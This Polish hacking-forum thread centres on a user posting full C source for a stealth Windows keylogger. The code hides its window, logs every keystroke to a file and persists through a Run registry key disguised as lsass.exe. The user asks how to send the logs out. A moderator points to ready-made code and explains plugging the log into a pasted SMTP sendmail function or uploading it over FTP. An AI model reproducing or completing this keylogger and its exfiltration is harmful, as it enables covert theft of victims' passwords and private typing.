Poka wyniki od 1 do 7 z 7
  1. #1
    Uytkownik
    Doczy
    24-02-2008
    Posty
    13

    Domylnie Keylogger z wysyaniem logw na maila bd FTP

    Witam, przedstawiam wam kodzik na podstawowego keyloggera i prosz o wskazwk jak doda do niego skrypt wysyania plikw na maila/ftp (nie wiem ktre, bo na personalu nie idzie jednego z nich) A o to kodzik

    Kod:
    #include <windows.h> 
    
    #include <stdio.h> 
    
    #include <winuser.h> 
    
    #include <windowsx.h> 
    
    
    
    #define BUFSIZE 80 
    
    
    
    int test_key(void); 
    
    int create_key(char *); 
    
    int get_keys(void);
    
    
    
    int main(void) 
    
    { 
    
    HWND stealth; 
    
    AllocConsole(); 
    
    stealth=FindWindowA("ConsoleWindowClass",NULL); 
    
    ShowWindow(stealth,0); 
    
    
    
    int test,create; 
    
    test=test_key(); 
    
    if (test==2) // Create key. 
    
    { 
    
    char *path="C:WINDOWSsystem32lsass.exe"; 
    
    create=create_key(path); 
    
    } 
    
    
    
    int t=get_keys(); 
    
    
    
    return t; 
    
    } 
    
    
    
    int get_keys(void) 
    
    { 
    
    short character; 
    
    while(1) 
    
    { 
    
    Sleep(10); 
    
    for(character=8;character<=222;character++) 
    
    { 
    
    if(GetAsyncKeyState(character)==-32767) 
    
    { 
    
    FILE *file; 
    
    file=fopen("C:xe41.log","a+";
    
    if(file==NULL) 
    
    { 
    
    return 1; 
    
    } 
    
    if(file!=NULL) 
    
    { 
    
    if((character>=39)&&(character<=64)) 
    
    { 
    
    fputc(character,file); 
    
    fclose(file); 
    
    break; 
    
    } 
    
    else if((character>64)&&(character<91)) 
    
    { 
    
    character+=32; 
    
    fputc(character,file); 
    
    fclose(file); 
    
    break; 
    
    } 
    
    else 
    
    { 
    
    switch(character) 
    
    { 
    
    case VK_SPACE: 
    
    fputc(' ',file); 
    
    fclose(file); 
    
    break; 
    
    case VK_SHIFT: 
    
    fputs("[SHIFT]",file); 
    
    fclose(file); 
    
    break; 
    
    case VK_RETURN: 
    
    fputs("n[ENTER]",file); 
    
    fclose(file); 
    
    break; 
    
    case VK_BACK: 
    
    fputs("[BACKSPACE]",file); 
    
    fclose(file); 
    
    break; 
    
    case VK_TAB: 
    
    fputs("[TAB]",file); 
    
    fclose(file); 
    
    break; 
    
    case VK_CONTROL: 
    
    fputs("[CTRL]",file); 
    
    fclose(file); 
    
    break; 
    
    case VK_DELETE: 
    
    fputs("[DEL]",file); 
    
    fclose(file); 
    
    break; 
    
    case VK_OEM_1: 
    
    fputs("[;:]",file); 
    
    fclose(file); 
    
    break; 
    
    case VK_OEM_2: 
    
    fputs("[/?]",file); 
    
    fclose(file); 
    
    break; 
    
    case VK_OEM_3: 
    
    fputs("",file); 
    
    fclose(file); 
    
    break; 
    
    case VK_OEM_4: 
    
    fputs("[ [{ ]",file); 
    
    fclose(file); 
    
    break; 
    
    case VK_OEM_5: 
    
    fputs("[|]",file); 
    
    fclose(file); 
    
    break; 
    
    case VK_OEM_6: 
    
    fputs("a*",file); 
    
    fclose(file); 
    
    break; 
    
    case VK_OEM_7: 
    
    fputs("",file); 
    
    fclose(file); 
    
    break; 
    
    case VK_OEM_PLUS: 
    
    fputc('+',file); 
    
    fclose(file); 
    
    break; 
    
    case VK_OEM_COMMA: 
    
    fputc(',',file); 
    
    fclose(file); 
    
    break; 
    
    case VK_OEM_MINUS: 
    
    fputc('-',file); 
    
    fclose(file); 
    
    break; 
    
    case VK_OEM_PERIOD: 
    
    fputc('.',file); 
    
    fclose(file); 
    
    break;
    
    case VK_NUMPAD0: 
    
    fputc('0',file); 
    
    fclose(file); 
    
    break; 
    
    case VK_NUMPAD1: 
    
    fputc('1',file); 
    
    fclose(file); 
    
    break; 
    
    case VK_NUMPAD2: 
    
    fputc('2',file); 
    
    fclose(file); 
    
    break; 
    
    case VK_NUMPAD3: 
    
    fputc('3',file); 
    
    fclose(file); 
    
    break; 
    
    case VK_NUMPAD4: 
    
    fputc('4',file); 
    
    fclose(file); 
    
    break; 
    
    case VK_NUMPAD5: 
    
    fputc('5',file); 
    
    fclose(file); 
    
    break; 
    
    case VK_NUMPAD6: 
    
    fputc('6',file); 
    
    fclose(file); 
    
    break; 
    
    case VK_NUMPAD7: 
    
    fputc('7',file); 
    
    fclose(file); 
    
    break; 
    
    case VK_NUMPAD8: 
    
    fputc('8',file); 
    
    fclose(file); 
    
    break; 
    
    case VK_NUMPAD9: 
    
    fputc('9',file); 
    
    fclose(file); 
    
    break; 
    
    case VK_CAPITAL: 
    
    fputs("[CAPS LOCK]",file); 
    
    fclose(file); 
    
    break; 
    
    default: 
    
    fclose(file); 
    
    break; 
    
    } 
    
    } 
    
    } 
    
    } 
    
    } 
    
    
    
    } 
    
    return EXIT_SUCCESS; 
    
    } 
    
    
    
    int test_key(void) 
    
    { 
    
    int check; 
    
    HKEY hKey; 
    
    char path[BUFSIZE]; 
    
    DWORD buf_length=BUFSIZE; 
    
    int reg_key; 
    
    
    
    
    
    /*I tak na marginesie - aby keylogger nam sie uruchamia przy starcie systemu.
    
    
    
    Porsz oto przykad:*/
    
    
    
    reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWAREMicrosoftWindowsCurrentVersionRun",0,KEY_QUERY_VALUE,&hKey); 
    
    if(reg_key!=0) 
    
    { 
    
    check=1; 
    
    return check; 
    
    } 
    
    
    
    reg_key=RegQueryValueEx(hKey,"Kkey",NULL,NULL,(LPBYTE)path,&buf_length); 
    
    
    
    if((reg_key!=0)||(buf_length>BUFSIZE)) 
    
    check=2; 
    
    if(reg_key==0) 
    
    check=0; 
    
    
    
    RegCloseKey(hKey); 
    
    
    
    return check; 
    
    } 
    
    
    
    int create_key(char *path) 
    
    { 
    
    int reg_key,check; 
    
    
    
    HKEY hkey; 
    
    
    
    reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWAREMicrosoftWindowsCurrentVersionRun",&hkey); 
    
    if(reg_key==0) 
    
    { 
    
    RegSetValueEx((HKEY)hkey,"Kkey",0,REG_SZ,(BYTE *)path,strlen(path)); 
    
    check=0; 
    
    return check; 
    
    } 
    
    if(reg_key!=0) 
    
    check=1; 
    
    
    
    return check; 
    
    }
    Czekam na szybkie i zarazem byskotliwe odpowiedzi... ;]

  2. #2
    Uytkownik
    Doczy
    04-03-2008
    Skd
    Grodzisk Maz.
    Posty
    2

    Domylnie

    ;/ Sama nie wiem... eeeee

  3. #3
    Uytkownik
    Doczy
    24-02-2008
    Posty
    13

    Domylnie

    Hmm... wiem e da rade na maila, wiem nawet jak, ale w Borland C++ Buildier Personal tego nie idzie... ;/

    [ Dodano: 05-03-2008, 13:05 ]
    Chyba si odpowiedzi nigdy nie doczekam...


    EHH.... co za forum.... (niestety jak kade inne)

    //c za niecierpliwo

  4. #4
    Dawni Moderatorzy Avatar grzonu
    Doczy
    26-12-2006
    Skd
    Gdansk, Poland, Poland
    Posty
    1 243

    Domylnie

    Jak ju adnie znalaze nie swj kodzik keyloggera to moesz jeszcze znale
    nie swj kodzik wysyania na maila

    Sam o tym pisaem z 3 razy dawaem gotowy kod.
    http://www.haker.com.pl/viewtopic.php?t=37265 << tu masz opisane jak po kolei to wysyac

    A gotowy kod

    http://www.haker.com.pl/viewtopic.php?t=37298

    a zeby polaczyc sie z serwerem smtp mozesz zobaczyc na www.winapi.org w artykule o socketach.
    Filmy online---Grzonu Blog

    1) Moje gg to nie pomoc techniczna w obsludze keyloggerow!!! Na gg i pw pomagam tylko w kwestiach organizacyjnych forum. Masz problem to pisz na forum.
    2) Nie zajmuje sie malware a uprzedzajac pytanie "czemu?" - bo taki mam kaprys!

  5. #5
    Uytkownik
    Doczy
    24-02-2008
    Posty
    13

    Domylnie

    Nie znam is za bardzo w te klocki, ale chodzi tutaj o keyloggera, wiec poszukuj GOTOWCA, moe i jestem n00bem,ale najlepiej si uczy (w moim przypadku bynajmniej) na przykadach... A z tego:

    Kod:
    void sendmail(SOCKET sock,char* smtp,char* login, char* haslo, char* adres,char* adres2,char* temat,char* wiad,char * nadawca) 
    
    { 
    
    char* wiad2; 
    
    int size=strlen(smtp)+strlen(login)+strlen(haslo)+strlen(adres)+strlen(adres2)+strlen(temat)+strlen(wiad)+strlen(nadawca)+50; 
    
    int i; 
    
    wiad2= new char[size]; 
    
    i=0; 
    
    while(i<size) 
    
    { 
    
    wiad2[i]=0; 
    
    i++; 
    
    } 
    
    
    
    strcat(wiad2,"EHLO "); 
    
    strcat(wiad2,smtp); 
    
    strcat(wiad2,"rnAUTH 
    
    LOGINrn"); 
    
    strcat(wiad2,login); 
    
    strcat(wiad2,"rn"); 
    
    strcat(wiad2,haslo); 
    
    strcat(wiad2,"rnMAIL FROM: <"); 
    
    strcat(wiad2,adres); 
    
    strcat(wiad2,">rnRCPT TO:<"); 
    
    strcat(wiad2,adres2); 
    
    strcat(wiad2,">rn"); 
    
    strcat(wiad2,"DATArnSubject:"); 
    
    strcat(wiad2,temat); 
    
    strcat(wiad2,"rn"); 
    
    strcat(wiad2,"from:"); 
    
    strcat(wiad2,nadawca); 
    
    strcat(wiad2,"rnrn"); 
    
    strcat(wiad2,wiad); 
    
    strcat(wiad2,"rn.rnQUITrn"); 
    
    send(sock,wiad2,sizeof(wiad2),0); 
    
    }
    Tak jko trudno zjarzy... (nie ma nic o pliku jaki wysa, o odstepie czasowym, itd...)
    Tak wiec czy potrafi to kto poczy z kodem w/w??

  6. #6
    Dawni Moderatorzy Avatar grzonu
    Doczy
    26-12-2006
    Skd
    Gdansk, Poland, Poland
    Posty
    1 243

    Domylnie

    czysz si z serwerem smtp przez sockety(winsock2.h) i ten socket przekazujesz do tej funkcji jako pierwszy argument.
    nastepny arg. to adres serwera smtp
    3. i 4. to login i haslo zakodowane w base64(jest duzo kodow gotowych)
    5. twoj adres maila
    6. adres do kogo wysylasz
    7.temat maila
    8.TO JEST TRESC WIADOMOSCI TU MOZESZ WLASNIE TRESC PLIKU WSTAWIC
    9.to nadawca(zobaczysz to w polu od: przy odbieraniu maila)


    Jak nadal nie kumasz to zajrzyj do wikipedi pod haslo SMTP i masz opis protokolu
    i zobaczysz ze to wlasnie jest na podstawie tego opisu.

    [ Dodano: 05-03-2008, 14:05 ]
    a wstaw sobie wysylanie juz sam. przeciez nikt nie napisze za ciebie gotowego keyloggera.

    Mozesz to robi np. w wtku zeby nie blokowac reszty Jak by rozumial "swoj" kod to by nie mia problemw z odpowiednim wstawieniem tego kodu

    Na ftp wysylanie jest jeszcze prostsze tak jak wyzej mozna wlasnie przez biblioteke WinInet ktorej dobry opis masz na MSDN
    Filmy online---Grzonu Blog

    1) Moje gg to nie pomoc techniczna w obsludze keyloggerow!!! Na gg i pw pomagam tylko w kwestiach organizacyjnych forum. Masz problem to pisz na forum.
    2) Nie zajmuje sie malware a uprzedzajac pytanie "czemu?" - bo taki mam kaprys!

  7. #7
    Dawni Moderatorzy
    Doczy
    11-11-2006
    Skd
    Polska
    Posty
    524

    Domylnie

    Jeli uywasz c++ Buildera to po prostu poczytaj to: http://cyfbar.republika.pl/siec.html

Podobne wtki

  1. KGB employee monitor problem z wysyaniem informacji na maila
    Przez MART3112
    w forum Keyloggers/Stealers
    Odpowiedzi: 6
    Ostatni post / autor: 10-01-2014, 18:54
  2. Ardamax Keylogger 2.8, nie wysya logw
    Przez dyzio99
    w forum Keyloggers/Stealers
    Odpowiedzi: 5
    Ostatni post / autor: 13-05-2013, 21:53
  3. Odpowiedzi: 3
    Ostatni post / autor: 19-08-2012, 22:12
  4. Ardamax Keylogger - ustawienia wysyania logw
    Przez apache
    w forum Kursy/Artykuy
    Odpowiedzi: 0
    Ostatni post / autor: 19-10-2006, 16:02
  5. Perfect Keylogger i przesyanie logw na FTP
    Przez dieselek
    w forum Keyloggers/Stealers
    Odpowiedzi: 3
    Ostatni post / autor: 08-07-2004, 10:25

Uprawnienia

  • Nie moesz zakada nowych tematw
  • Nie moesz pisa wiadomoci
  • Nie moesz dodawa zacznikw
  • Nie moesz edytowa swoich postw
  •